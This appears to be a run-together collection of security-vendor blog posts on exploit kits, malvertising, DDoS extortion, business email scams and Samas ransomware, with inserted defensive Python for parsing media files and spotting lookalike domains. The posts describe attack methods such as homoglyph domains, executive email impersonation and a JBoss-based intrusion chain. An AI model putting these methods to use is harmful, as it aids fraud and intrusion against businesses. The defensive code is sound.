Even if AUPs are followed to the letter, malware may still be downloaded onto the network. The risk has recently been highlighted by two security incidents discovered in the past two weeks.
Legitimate Websites Compromised with Angler Exploit Kit
Last week, news emerged that a toy manufacturer’s website had been compromised and was being used to infect visitors with malware. The website had been loaded with the Angler exploit kit and was being used to silently infect visitors’ devices with ransomware.
An exploit kit is a malicious toolkit used by hackers to probe for security vulnerabilities in website visitors’ browsers. A visitor to a website containing an exploit kit – BlackHole, Magnitude, Nuclear, Styx, or Angler for example – will have their browser checked for out-of-date plugins such as Adobe Reader, Silverlight, Flash, or Java. If the plugins are not up to date, security vulnerabilities can be exploited to download a payload of malware. These attacks are silent and the website visitor will be unaware that their machine has been compromised.
This week, two more websites were discovered to have been hijacked and were being used to direct visitors to the Angler exploit kit. These websites were much more likely to be visited by company employees. They were the sites of two CBS-affiliated TV stations: KMOV in St. Louis and WBTV in Charlotte, North Carolina.
These news websites would be unlikely to be banned in AUPs, and few organizations would see the risk of their employees visiting these websites.
News Websites Contained Malvertising Directing Users to the Angler Exploit Kit
While the toy manufacturer’s website was directly infecting visitors, in the case of KMOV and WBTV the attackers were using a common technique called malvertising. The websites had not been loaded with the Angler exploit kit; instead, the attacks were taking place via third-party adverts that were being served on the sites.
The sites contain ad blocks which were used to serve advertisements via the Taggify network – a legitimate advertising network. However, a rogue advertiser had got around the controls put in place by Taggify and malicious adverts were being served.
Reduce Risk of Attack with a Web Filtering Solution
These three recent cases are just the tip of the iceberg. Criminals are hijacking all manner of websites and using them to host exploit kits. Legitimate websites serving third party adverts are also being targeted with malvertising.
Enforcing AUPs with a web filtering solution can help to prevent end users from visiting websites that have been compromised with malware. A web filter – such as WebTitan – can also be used to block third party advertisements from being displayed.
Unfortunately for enterprises, it is not possible to install patches as soon as they are released. Many patches require reboots, and that is not practical. The number of patches being released to plug security holes is considerable, and it takes time to patch all devices that connect to a network. Good patch management policies can reduce the likelihood of a successful attack, but they cannot prevent all attacks from taking place. If a web filtering solution is used that can block malvertising and websites known to contain malware, end users and networks will be better protected.
There are some very good reasons why you should block file sharing websites. These websites are primarily used to share pirated software, music, films, and TV shows. It would be unlikely for the owner of the copyright to take action against an employer for failing to prevent the illegal sharing of copyrighted material, but this is an unnecessary legal risk.
However, the main risk from using these websites comes from malware. Research conducted by IDC in 2013 showed that out of 533 tests of websites and peer-to-peer file sharing networks, the downloading of pirated software resulted in spyware and tracking cookies being downloaded to users’ computers 78% of the time. More worryingly, Trojans were downloaded with pirated software 36% of the time.
A survey conducted on IT managers and CIOs at the time indicated that malware was installed 15% of the time with the software. IDC determined that overall there was a one in three chance of infecting a machine with malware by using pirated software.
Even visiting torrent sites can be harmful. This week Malwarebytes reported that visitors to The Pirate Bay were served malicious adverts. An advertiser used a pop-under to silently redirect users to a malicious site containing the Magnitude exploit kit, which was used to download Cerber ransomware onto users’ devices.
A study conducted by UC San Diego involved testing pirated software downloads using VirusTotal. VirusTotal checks files against the databases of 47 different anti-virus engines. The research team determined that 50% of pirated files were infected with malware.
Dealing with malware from pirated software was determined to take around 1.5 billion hours per year. For businesses the cost can be considerable. IDC calculated the cost to enterprises to be around $114 billion in 2013 alone. And that was just for the clean-up. The cost of data breaches caused by illegal software installations was estimated to be in the order of $350 billion.
Time to Block File Sharing Websites?
Organizations can monitor devices and check for unauthorized software installations on individual devices; however, by the time a software installation has been discovered, malware is likely to already have been installed. A recent report by Verizon suggests that on average, hackers are able to exfiltrate data within 28 minutes of gaining access to a system.
One of the easiest ways to manage risk is to block file sharing websites such as P2P and torrent sites. A web filter can be easily configured to block file sharing websites and prevent them from being accessed. Many web filters can also be configured to block specific file types from being downloaded, such as keygens and other executables.
By blocking file sharing websites organizations can ensure that copyright-violating activities are prevented and malware risk is effectively managed. Furthermore, web filters can be used to block web-borne threats such as phishing websites, compromised webpages, spam and botnets, adware, malware, ransomware, and anonymizers.
The failure to block file sharing websites could turn out to be costly. It is far better to block potentially dangerous websites and online activities than to have to cover the cost of removing malware infections and dealing with data breaches.
One cybercriminal gang has resorted to a mafia-style protection racket to obtain money, although it would appear that businesses are being sent empty DDoS threats. While many companies have sent money to the criminal gang, which claims to be the Armada Collective, there is no evidence to suggest that the gang is following through on its threat of conducting large-scale Distributed Denial of Service (DDoS) attacks.
Empty DDoS Threats Still Proving Lucrative for Attackers
The gang has been sending emails to businesses threatening them with a powerful DDoS attack if they do not send protection money to the gang. The demands appear to range from 10 to 50 Bitcoin, and over 100 organizations have given in to the attackers’ demands according to DDoS mitigation vendor CloudFlare. So far the gang has gathered around $100,000 in payments, yet no DDoS attacks have been conducted.
Armada Collective is the name of a hacking group already known to conduct massive DDoS attacks. The emails claim that the gang is able to deliver a DDoS attack in excess of 1 Tbps. The group also claims to be able to bypass security controls set up to protect against DDoS attacks. In case recipients of the email are in any doubt as to who the attackers are and what they are capable of, they are advised to conduct a search on Google. Armada Collective has been known to conduct DDoS attacks of up to 500 Gbps.
Are the Latest Emails from a Copycat Group?
According to CloudFlare, it may not be a case of the hackers not having the capability to pull off a large scale DDoS attack on companies that do not pay, rather the attackers may not be able to tell who has paid and who has not. The emails are reusing Bitcoin addresses so there is no way of confirming which companies have paid. Emails are also being sent containing the same text and payment demands, regardless of the size of the organization.
However, empty DDoS threats or not, many companies are unprepared to take the risk and have paid between $4,500 and $23,000 to stop the attacks.
CloudFlare suspects that the extortionists are not who they claim to be. The Armada Collective has not been conducting attacks for some time. CloudFlare researchers believe that the group has been operating under a different name – DD4BC. However, suspected members of that group were arrested as part of Operation Pleiades last year – an international effort to bring down hacking groups that have been conducting DDoS attacks.
The group behind this campaign may well be imposters, although many hackers send out threats of DDoS attacks along with demands for payment. Some of those attackers are more than willing to follow through on the threats and have the capability to launch attacks.
It is never a good idea to give in to attackers’ demands, but it is important to ensure that protections have been put in place to resist DDoS attacks and to seek advice before taking any action if an email demand is received.
Organizations are investing in technology to ensure that perimeter defenses are not breached; however, it is also important to address the risk of insider data breaches. According to a recent report from Forrester, internal incidents were responsible for more than half of data breaches suffered by firms. Cybercriminals have stepped up their efforts and are attacking organizations with increased vigor, but the report suggests more than half of data breaches are caused by employee errors, oversights, and negligence.
Employees are under increasing pressure to get more work completed in less time. This can easily lead to errors being made or shortcuts being taken. Employees may be security minded most of the time, but it is all too easy for sloppy data security practices to creep in. Even with the most robust perimeter security defenses in place, simple mistakes can lead to disaster.
Email Borne Attacks Are Still A Major Risk
During the past 12 months the volume of spam email has fallen considerably. This is partly due to law enforcement taking down major botnets and the increasing use of efficient spam filters. Even with the reduced volume, the threat from spam email is considerable. The Forrester report indicates spam email volume has dropped from almost 89% of all emails in 2014 to 68% of emails in 2015. However, over 91% of all spam emails contain a malicious link and 2.34% contain malicious email attachments.
Cybersecurity awareness training has helped to mitigate the risk of insider breaches to some degree but they are still occurring. Most employees now know not to open email attachments from people they do not know, but what about from people they do know?
There has been an increase in business email compromise attacks in recent months. These attacks involve the sending of spam and phishing emails from within an organization. These emails are more likely to result in malicious email attachments being opened and links being clicked than emails from strangers. All emails should be treated as suspicious and should be carefully checked, not only those from outside an organization.
Employees are aware never to run an executable file that has been sent via email and to be wary of opening zip files from strangers. The Forrester report suggests that attackers are increasingly using standard office files to infect their targets. Microsoft Office files are used in 44.7% of attacks.
Employees who install unauthorized software are also placing their companies at risk. The use of shadow IT is behind many data breaches. Cybercriminals are exploiting vulnerabilities in the software installed by end users. Many of these programs contain serious vulnerabilities.
How to Address the Risk of Insider Data Breaches
Tackling the threat from within is more complicated than securing the defense perimeter, as it is far harder to prevent employees from making simple mistakes. Organizations must take steps to reduce the likelihood of mistakes being made, while also ensuring that when employees do make data security errors, those errors do not prove to be catastrophic.
Some of the ways organizations can address the risk of insider data breaches include:
- Conducting background checks before hiring new staff
- Ensuring access to systems is terminated before staff are
- Limiting network privileges
- Blocking the copying of critical data onto portable devices
- Providing all new staff with data security training
- Regularly conducting refresher training sessions
- Conducting quarterly cybersecurity fire drills to ensure training is not forgotten
- Sending regular email bulletins to keep cybersecurity awareness training fresh in the mind
- Sending dummy phishing emails to staff to test the effectiveness of training
- Scanning for shadow IT installed on user devices
- Ensuring bank transfer requests are checked by two individuals before being authorized
- Using a web filtering service to block phishing websites and limiting access to potentially risky websites
- Configuring a web filter to block the downloading of risky file types
It may not be possible to eliminate the risk of insider data breaches, but it is possible to effectively mitigate risk.
The healthcare industry has had a hard time in recent months; however, it is far from the only industry being targeted by hackers. Manufacturing company cyberattacks are on the increase and the industry is now second only to healthcare according to a new report from IBM X-Force Research. The manufacturing industry has replaced the financial sector as hackers attempt to gain access to intellectual property. Intellectual property can be sold for big bucks on the black market.
$400 Billion Worth of Intellectual Property Is Stolen from U.S. Companies Every Year
According to figures from the Federal Bureau of Investigation, each year over $400 billion worth of intellectual property is stolen from the United States and sold overseas. Many of the attacks are conducted by nation-state backed hacking groups, although a number of players have now got in on the act due to the value of data and the relative ease of breaking through manufacturing company cybersecurity defenses.
According to IBM’s 2016 Cyber Security Intelligence Index, manufacturers in the automotive sector were most frequently targeted. Chemical companies were the second most likely to be attacked. 30% of manufacturing company cyberattacks took place on automotive manufacturers.
Not only are the potential rewards for successful manufacturing company cyberattacks high, attacks are relatively easy to pull off. A successful attack on a company in the financial sector may be rewarding, but the defenses put in place to keep hackers at bay are usually far more robust than in less well regulated industries such as manufacturing. The manufacturing industry has been relatively slow to improve cybersecurity defenses.
Organizations in the healthcare industry are required to comply with the Health Insurance Portability and Accountability Act or HIPAA for short. HIPAA sets a number of minimum standards which must be met by all healthcare organizations. Administrative, technical, and physical safeguards must be implemented to keep patient data protected. The legislation has forced healthcare companies to improve their cybersecurity defenses.
Similarly, legislation has been introduced that requires organizations in the financial services industry to improve protections to keep data secure. Organizations must comply with the Gramm-Leach-Bliley Act and implement Payment Card Industry Data Security Standards. With no equivalent legislation covering the manufacturing industry, companies have not been forced to improve their cybersecurity defenses. While many organizations have implemented robust multi-layered security defenses, data security standards are higher in the healthcare and financial services verticals.
Many Manufacturing Company Cyberattacks Target Employees
With the number of manufacturing company cyberattacks increasing, cybersecurity defenses need to be improved. Many of the attacks target end users. Phishing and spear phishing emails can be a highly effective way of getting past security defenses. Employees are seen to be the weakest link in the security chain.
IBM X-Force senior threat researcher John Kuhn pointed out that servers are being targeted by hackers using phishing and spear phishing schemes. If employees can be lured onto malicious websites, vulnerabilities can be exploited and malware downloaded onto computers. From there it is a small hop to network servers.
Providing security training to staff is essential to reduce the risk of phishing attacks being successful. However, training alone is not sufficient to prevent all attacks. Software solutions should also be used to make it harder for end users to inadvertently install malware. A web filter should be implemented to prevent end users from downloading malicious software and visiting compromised websites. Web filtering can be a highly effective way of preventing attacks that target employees.
It is also essential to conduct comprehensive risk assessments to identify security vulnerabilities. All systems need to be assessed regularly. Any vulnerabilities identified need to be promptly addressed.
Two new vulnerabilities in QuickTime for Windows have recently been discovered, but a patch to address the flaws will not be issued by Apple. Apple has taken the decision to deprecate QuickTime for Windows and has advised all Windows users to uninstall the software to prevent the vulnerabilities from being exploited. Apple intends to keep supporting the OS X version.
The latest vulnerabilities in QuickTime for Windows (named ZDI-16-241 and ZDI-16-242) are both heap corruption remote code execution vulnerabilities, both of which allow an attacker to write data outside of an allocated heap buffer. The vulnerabilities could be exploited remotely, although user interaction is required. In order for an attacker to exploit these vulnerabilities the target would be required to open a malicious file or visit a malicious website.
One of the vulnerabilities affects the moov atom (ZDI-16-241) while the other (ZDI-16-242) involves a flaw in atom processing. Both could allow data to be written outside of an allocated heap buffer when an invalid index is supplied. This would allow code to be executed in the context of the QuickTime for Windows player.
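The class of bounds check whose absence the passage describes, as an added Python illustration (not Apple’s QuickTime code and not a reproduction of the ZDI flaws): a defensive walker for the size+type atom layout used by QuickTime containers, with a counted-table lookup that validates the index before computing an offset. All function names and the sample bytes are constructed for this example.

```python
import struct

# Added illustration: every declared atom size is checked against the
# enclosing buffer before it is trusted, and table lookups validate the
# index against the entry count. The sample bytes below are constructed.

ATOM_HEADER = struct.Struct(">I4s")   # 32-bit big-endian size, 4-byte type


def walk_atoms(data, start=0, end=None):
    """Yield (type, payload_start, payload_end) for each atom in data[start:end].

    Raises ValueError for any atom whose declared size does not fit inside
    the enclosing container, so a hostile size can never turn into an
    out-of-bounds read or write further down the parser.
    """
    if end is None:
        end = len(data)
    pos = start
    while pos < end:
        remaining = end - pos
        if remaining < ATOM_HEADER.size:
            raise ValueError("truncated atom header at offset %d" % pos)
        size, kind = ATOM_HEADER.unpack_from(data, pos)
        header_len = ATOM_HEADER.size
        if size == 1:
            # size == 1 means a 64-bit size follows the 8-byte header
            if remaining < header_len + 8:
                raise ValueError("truncated extended size at offset %d" % pos)
            size = struct.unpack_from(">Q", data, pos + header_len)[0]
            header_len += 8
        elif size == 0:
            # size == 0 means the atom runs to the end of its container
            size = remaining
        if size < header_len or size > remaining:
            raise ValueError("atom %r at offset %d declares %d bytes, %d available"
                             % (kind, pos, size, remaining))
        yield kind, pos + header_len, pos + size
        pos += size


def top_level_types(data):
    """Return the list of top-level atom types, or raise on a malformed file."""
    return [kind for kind, _, _ in walk_atoms(data)]


def child_types(data, parent):
    """Return the types of atoms nested directly inside the first `parent` atom."""
    for kind, pstart, pend in walk_atoms(data):
        if kind == parent:
            return [k for k, _, _ in walk_atoms(data, pstart, pend)]
    return []


def table_entry(payload, index, entry_size):
    """Fetch entry `index` from a counted table: 4-byte version/flags,
    4-byte big-endian entry count, then fixed-size entries.

    The count is checked against the payload length and the index against
    the count before any offset is computed, so an invalid index is
    rejected instead of being used to address memory outside the table.
    """
    if len(payload) < 8:
        raise ValueError("table too short for its header")
    count = struct.unpack_from(">I", payload, 4)[0]
    if count * entry_size > len(payload) - 8:
        raise ValueError("entry count %d exceeds table payload" % count)
    if not 0 <= index < count:
        raise ValueError("index %d out of range for %d entries" % (index, count))
    offset = 8 + index * entry_size
    return payload[offset:offset + entry_size]


def build_atom(kind, payload):
    """Helper to construct a well-formed atom for the samples below."""
    return ATOM_HEADER.pack(ATOM_HEADER.size + len(payload), kind) + payload


def rejects(fn, *args):
    """True if fn(*args) is rejected with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


# Constructed samples: a tiny well-formed layout, an atom whose size runs
# past the end of the file, a to-end-of-container atom, and a 2-entry table.
SAMPLE_OK = (build_atom(b"ftyp", b"qt  ")
             + build_atom(b"moov", build_atom(b"mvhd", b"\x00" * 8)
                                   + build_atom(b"trak", b"")))
SAMPLE_OVERSIZED = build_atom(b"ftyp", b"qt  ") + ATOM_HEADER.pack(0x7FFFFFFF, b"moov")
SAMPLE_TO_END = ATOM_HEADER.pack(0, b"free") + b"xyz"
SAMPLE_TABLE = b"\x00\x00\x00\x00" + struct.pack(">I", 2) + b"AAAA" + b"BBBB"
SAMPLE_BAD_COUNT = b"\x00\x00\x00\x00" + struct.pack(">I", 100) + b"AAAA"


def is_well_formed(data):
    """True when every top-level atom and every child of moov fits its container."""
    try:
        for kind, pstart, pend in walk_atoms(data):
            if kind == b"moov":
                list(walk_atoms(data, pstart, pend))
    except ValueError:
        return False
    return True
```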
Latest Vulnerabilities in QuickTime for Windows Require Uninstallation of the Software
The discovery of the new vulnerabilities in QuickTime for Windows spells the end of the software for Windows users. Apple, Trend Micro, and US-CERT have all advised Windows users to uninstall QuickTime ASAP in order to stay protected.
These two new vulnerabilities are unlikely to be the last to be discovered. Leaving the software installed will place users at risk of attack. Exploits for the new vulnerabilities are not believed to have been developed yet, and no active attacks are understood to have been conducted, but it is only a matter of time before the vulnerabilities are added to exploit kits.
Whenever a software developer takes the decision to stop supporting software it means users must find alternatives. IT departments should ensure that all Windows machines have QuickTime uninstalled as soon as possible.
Apple has decided to stop support for QuickTime for Windows as most media programs no longer use QuickTime to play common formats, while HTML 5 has rendered the browser add-on obsolete.
To uninstall QuickTime for Windows, conduct a search for the uninstaller – search for “uninstall QuickTime” – or remove the program via the Windows Control Panel. Apple advises users to save the registration key if using QuickTime 7 Pro, which can be found in the “Register” tab of the program (Click Edit > Preferences).
A recent investigation by cyber security company F-Secure has revealed that corporate network cybersecurity defenses are anything but secure. The company recently assessed the cybersecurity protections in place at a large number of companies and discovered thousands of security vulnerabilities that could all too easily be exploited by hackers.
Holes in Corporate Network Cybersecurity Defenses Could be Easily Plugged
The company discovered almost 85,000 vulnerabilities in corporate network cybersecurity defenses. 7% of the 100 most common flaws were severe according to National Vulnerability Database standards, and half of those vulnerabilities could be exploited remotely by hackers. In the majority of cases patches were available to address the vulnerabilities yet they had not yet been installed.
Numerous system misconfigurations were also discovered which could potentially be exploited by attackers. Simple administrative changes could address many of the vulnerabilities discovered by the researchers.
The top ten vulnerabilities discovered by F-Secure had a severity rating of low to moderate. While these vulnerabilities may not allow hackers to gain access to corporate networks, they indicate that the organizations in question do not have strong cybersecurity defenses. If these vulnerabilities were to be discovered by hackers, it could result in the company being probed and tested. In some cases, closer inspection would reveal exploitable weaknesses.
Previous research conducted by the United States Computer Emergency Readiness Team (US-CERT) suggests that in 85% of cases, targeted cyberattacks can be prevented by applying patches. However, F-Secure’s research indicates that patch management practices are substandard in many organizations. Even when patches are applied, all too often they are not applied to all systems and vulnerabilities are allowed to remain.
If patches are not applied to all systems and vulnerabilities are allowed to persist, it is only a matter of time before corporate network cybersecurity defenses are breached.
Internet Threats Now Reaching Critical Levels
An Internet security threat report issued by Symantec earlier this month shows that the threat to corporate networks is greater than ever before. Web-borne threats have increased substantially, while three quarters of websites were determined to contain vulnerabilities that could potentially be exploited by hackers.
Furthermore, the number of zero-day vulnerabilities doubled in 2015. As soon as a vulnerability is uncovered it is rapidly incorporated into exploit kits. Those exploit kits probe for these vulnerabilities and use them to download malware and ransomware.
The threat report also confirmed that ransomware attacks increased by 35% in 2015, while spear phishing attacks increased by 55%. Attacks on large organizations are to be expected, but the report showed that even small businesses are being attacked with increasing regularity.
Unless organizations make it harder for hackers to break through their defenses, the rise in successful cyberattacks is likely to continue.
Have you recently performed a complete risk assessment to check for security vulnerabilities?
Are you certain that all security holes in your company’s defenses have been plugged?
The dramatic rise in business email scams in the past 12 months has prompted the Federal Bureau of Investigation (FBI) to issue a new warning. Companies of all sizes are being targeted with business email compromise scams which relieve companies of tens of thousands if not hundreds of thousands or millions of dollars.
The FBI warns that scammers are now going to extraordinary lengths to fool company employees into making transfers of large sums of company funds into hacker’s accounts. These attacks are far from the random email spam campaigns typically associated with email scammers. Companies are extensively researched, individual targets are identified, and carefully crafted emails are sent. A variety of social engineering techniques are employed to convince an individual in the company to make a sizeable bank transfer to the attacker’s account.
There are two main variants of these business email scams. The first involves gaining access to the email account of the CEO or a senior executive in the company. This is usually achieved with a spear phishing campaign. This phase of the attack involves researching the company and identifying a target. That target is then sent a spear phishing email in order to gain access to their email login credentials.
Once access to an email account has been gained, emails are checked to determine the style of writing used by that individual – How they sign their emails, the terminology they use, and the level of familiarity they have with the second target: An individual that manages money or makes bank transfers for the company.
An email is then sent from the executive’s email account requesting a transfer be made. Account details are supplied with a reason for urgency, and an explanation of why the request is being made.
Since the emails come from a known source within the company, and the terminology and style of the email matches those typically received by the accounts department, the transfer is often made without being queried.
Another variation on the same theme does not require access to an email account. Instead a domain name is purchased that is virtually identical to that used by the target company, often with just two letters transposed. Typically, an L in the domain name is replaced with the numeral 1, or the letter O with a zero. Goog1e.com instead of google.com for example.
These business email scams are highly effective because they take advantage of employees’ reluctance to query requests from authority figures in their organization. The emails are also crafted so as not to arouse suspicion.
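A defender-side check for the lookalike-domain variant described above, as an added example that is not from the FBI warning or the original post: it undoes the substitutions the text names (digit 1 for the letter l, zero for the letter o) and flags a single adjacent-letter transposition against a list of trusted domains. The trusted domain example-corp.com, the sample From: headers, and all function names are constructed for this example.

```python
import email.utils

# Added example: classify a From: header as internal, lookalike, external
# or invalid. The trusted domain and sample senders are constructed.

# Visually confusable characters mapped back to the letters they imitate
CONFUSABLES = str.maketrans({"1": "l", "0": "o"})


def normalize(domain):
    """Lowercase the domain and undo the common digit-for-letter swaps."""
    return domain.lower().translate(CONFUSABLES)


def osa_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions
    and adjacent transpositions each cost 1, so 'exmaple' vs 'example' is 1."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def sender_domain(from_header):
    """Extract the domain from a From: header value, or None if it has none."""
    _, addr = email.utils.parseaddr(from_header)
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].lower()


def classify_sender(from_header, trusted_domains):
    """Return 'internal', 'lookalike', 'external' or 'invalid' for a sender.

    A domain is a lookalike when, after normalization, it equals a trusted
    domain or sits within one edit (including a transposition) of it, but
    is not that trusted domain exactly.
    """
    domain = sender_domain(from_header)
    if domain is None:
        return "invalid"
    trusted = {t.lower() for t in trusted_domains}
    if domain in trusted:
        return "internal"
    norm = normalize(domain)
    for t in trusted:
        t_norm = normalize(t)
        if norm == t_norm or osa_distance(norm, t_norm) <= 1:
            return "lookalike"
    return "external"


# Constructed trusted domain and sample From: headers with expected verdicts
TRUSTED = {"example-corp.com"}
SAMPLE_HEADERS = {
    "CEO <ceo@example-corp.com>": "internal",
    "CEO <ceo@examp1e-corp.com>": "lookalike",   # digit 1 for letter l
    "CEO <ceo@example-c0rp.com>": "lookalike",   # zero for letter o
    "CEO <ceo@exmaple-corp.com>": "lookalike",   # adjacent letters transposed
    "Vendor <ap@othervendor.net>": "external",
}


def check_samples():
    """Classify every sample header; returns a header -> verdict mapping."""
    return {h: classify_sender(h, TRUSTED) for h in SAMPLE_HEADERS}
```

A lookalike verdict is a signal for the accounts team to verify the request out of band, as the advice below recommends, not proof of fraud on its own.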
Business Email Scams Have Netted Criminals Over $2.3 Billion in Three Years
Over the past three years the FBI has received complaints about business email scams from over 79 countries, and from every state in the U.S. Recently attacks have spiked in Phoenix, with other U.S. cities also targeted. Between October 2013 and February 2016, the FBI has been informed of 17,642 victims of these attacks. Over $2.3 billion in losses have been reported.
However, recently the situation has become dire. There has been a 270% increase in business email scams since January 2015, and the amounts lost in each successful attack are substantial. The FBI reports that in Arizona the typical transfers requested are between $25,000 and $75,000. With such high rewards for criminals it is no surprise that so many attacks are being conducted.
The FBI has urged companies to exercise caution and to be on high alert for these business email scams. The advice provided is to be extremely wary of any email-only request for a wire transfer, even if it comes from within the company.
To prevent these attacks, accounts department staff should verify a transfer request with the individual by phone – never by email – and should check the email address of the sender carefully. Multi-level authentication of bank transfers should also be considered to reduce the risk of a successful attack.
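The lookalike-domain trick described above (l swapped for 1, o for 0, two letters transposed) and the advice to check the sender address carefully can both be automated. The following is an added example, not code from the original article: it classifies the sender domain of a transfer request against the company's own domains, and generalizes the article's cases to any single-character edit. The trusted domain and the sample addresses are constructed.

```python
"""Flag sender domains that impersonate a trusted company domain.

Added example (not from the original article). The trusted domain list and
the addresses in main() are constructed for illustration.
"""
import re
from typing import Iterable, Tuple

# Characters commonly substituted for letters they resemble; the article's
# examples are the numeral 1 for l and the digit 0 for o.
HOMOGLYPHS = {"1": "l", "0": "o"}


def sender_domain(address: str) -> str:
    """Extract the lowercase domain from 'Name <user@domain>' or 'user@domain'."""
    match = re.search(r"<([^>]+)>", address)
    addr = match.group(1) if match else address
    return addr.strip().rsplit("@", 1)[-1].lower()


def canonical(domain: str) -> str:
    """Map lookalike characters back to the letters they imitate."""
    return "".join(HOMOGLYPHS.get(c, c) for c in domain)


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: one insert, delete, substitute or
    adjacent transposition each counts as a single edit."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def classify(address: str, trusted: Iterable[str]) -> Tuple[str, str]:
    """Return ('trusted', ''), ('lookalike', reason) or ('external', '')."""
    domain = sender_domain(address)
    for t in (x.lower() for x in trusted):
        if domain == t:
            return ("trusted", "")
        # Same string once 1->l and 0->o are undone: a homoglyph domain.
        if canonical(domain) == canonical(t):
            return ("lookalike", "homoglyph substitution for " + t)
        # One character inserted, dropped, replaced or transposed.
        if osa_distance(domain, t) == 1:
            return ("lookalike", "one edit or transposition from " + t)
    return ("external", "")


def main() -> None:
    trusted = ["examplecorp.com"]  # constructed company domain
    samples = [  # constructed From: headers of incoming transfer requests
        "CEO <ceo@examplecorp.com>",
        "CEO <ceo@examp1ecorp.com>",
        "CEO <ceo@exmaplecorp.com>",
        "Vendor <billing@partner.example>",
    ]
    for s in samples:
        verdict, reason = classify(s, trusted)
        print(f"{s:40} -> {verdict} {reason}")


if __name__ == "__main__":
    main()
```

A verdict of "lookalike" is the cue for the phone verification the article recommends; the check is a filter for obvious impersonation, not a substitute for it.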
2015 may have been the year of the healthcare data breach, but 2016 is fast becoming the year of ransomware with new strains such as Samas ransomware appearing at an alarming rate. Recently the Federal Bureau of Investigation reached out to U.S. businesses, seeking help to deal with the latest Samas ransomware threat.
Samas Ransomware Being Used to Encrypt Networks
Samas ransomware – also known as Samsa, Samsam, and MSIL – is different from many strains of ransomware that were used by cybercriminals last year. The new ransomware strain is being used to attack businesses rather than consumers. Last year, criminals were sending out ransomware randomly via spam email.
Ransom demands of 0.5-1 Bitcoin were the norm, with consumers often willing to pay to recover their files, accounts, photographs, and other important data. However, businesses hold far more valuable data. If criminals are able to infect enterprise computers and encrypt important business files, higher ransom demands can be sent. In many cases those demands have been paid.
In order to obtain large ransoms, cybercriminals need to infect networks rather than single computers. If an end user downloads ransomware onto their computer, and that ransomware has the capability to spread laterally and infect other systems, enterprises are more likely to pay to unlock the encryption. Even when viable backups exist, the complexity of some of the ransomware now being used makes paying the ransom an easier and lower cost option. Since some ransomware is capable of deleting backup files, the restoration of data may simply not be an option. Samas ransomware has been reported to delete Volume Shadow Copy Service (VSS) data.
Access to Systems is Gained by Cybercriminals Weeks Before Samas Ransomware is Deployed
The mode of action of Samas ransomware is different from other families of malicious file-encrypting software such as Locky, CryptoWall, and Cryptolocker.
Attackers are exploiting a vulnerability in the JBoss enterprise application platform to compromise an external web server. This is achieved with JexBoss, an open source tool for testing and exploiting JBoss servers. Once access to a server has been gained, attackers mask communications using a Python-based SOCKS proxy. A variety of software tools are then used to obtain login credentials, which in turn are used to compromise other systems and devices within the organization’s infrastructure. Several different tactics are then used to deploy Samas ransomware on numerous machines.
Several analyses of infected systems were conducted by Dell SecureWorks, which revealed attackers had compromised systems several weeks or months before the ransomware was actually deployed. Had the system compromise been detected earlier, the ransomware infections could have been avoided. Unfortunately, the initial compromise is difficult to detect, and anti-virus products are slow to detect new threats such as Samas ransomware.
The FBI issued warnings last year over the rise in popularity of Bitcoin ransomware, and a few days ago the law enforcement agency reached out to companies requesting assistance to help it tackle the threat from the latest ransomware variants, just days before the malicious software was used on MedStar Health System.
Over the last few weeks a number of healthcare institutions have reported being attacked with ransomware, and there is no telling how many companies have had corporate and customer data encrypted by attackers. Many do not like to advertise the fact they have been attacked.
While attacks on individuals only result in relatively small ransoms being paid, the same cannot be said for companies. Ransom demands of tens of thousands of dollars are issued, and many companies feel they have little alternative but to pay the ransom demand in order to recover their data.
Unfortunately for enterprises, the threat from Bitcoin ransomware is unlikely to go away any time soon. More cybercriminals are getting in on the act and attacks will continue as long as they prove to be profitable. The bad news is Bitcoin ransomware is very effective. Worse still, attacks require little technical skill and cost very little to pull off.
Bitcoin Ransomware Kits Mean Little Skill is Required to Pull Off a Successful Attack
According to a report in the Italian newspaper La Stampa, the cost of conducting a ransomware attack can be shockingly low and requires little in the way of skill. One reporter at the newspaper set out to discover just how easy it is to buy ransomware and conduct an attack. After visiting underground forums on the darknet, the researcher found a board where ransomware-as-a-service was being offered.
One poster on a Russian forum was not only offering ransomware for sale, but made it exceptionally easy for would-be cybercriminals to conduct campaigns. The purchaser would be supplied with the ransomware, distribution tools to send out the malicious file-encrypting software via email and advertising networks, and this Bitcoin ransomware service could be bought for as little as $100.
According to the article, the purchaser would be allowed to keep 85% of the ransoms that were collected, with the remaining 15% going to the seller of the service. There appears to be no shortage of takers. The hacker behind this campaign allegedly has between 300 and 400 active customers. This is only one seller. There are many more offering such a service. The campaigns may not be particularly sophisticated, but the reality is that they don’t actually need to be.
Some sellers even offer Bitcoin ransomware kits where purchasers only need to enter in their Bitcoin address for the payment of the ransom, the amount they wish to charge their victims for the security keys, and they can download everything they need, including instructions on how to run the campaign. These services are not being sold for big bucks. The sellers know they can earn considerable sums by taking a cut of the ransoms that are paid.
The standard rates being charged by attackers to supply security keys for single computer infections is between 0.5 and 1 Bitcoin – approximately $200-$425. All that is required for an attacker to make a profit is one or two victims to install the Bitcoin ransomware and pay for a security key. According to data released by Tripwire, half of American ransomware victims have ended up paying the ransom demand to recover their data.
Until law enforcement efforts to track down attackers and shut down underground forums improve, and victims stop paying ransoms, the attacks are likely to continue to increase.
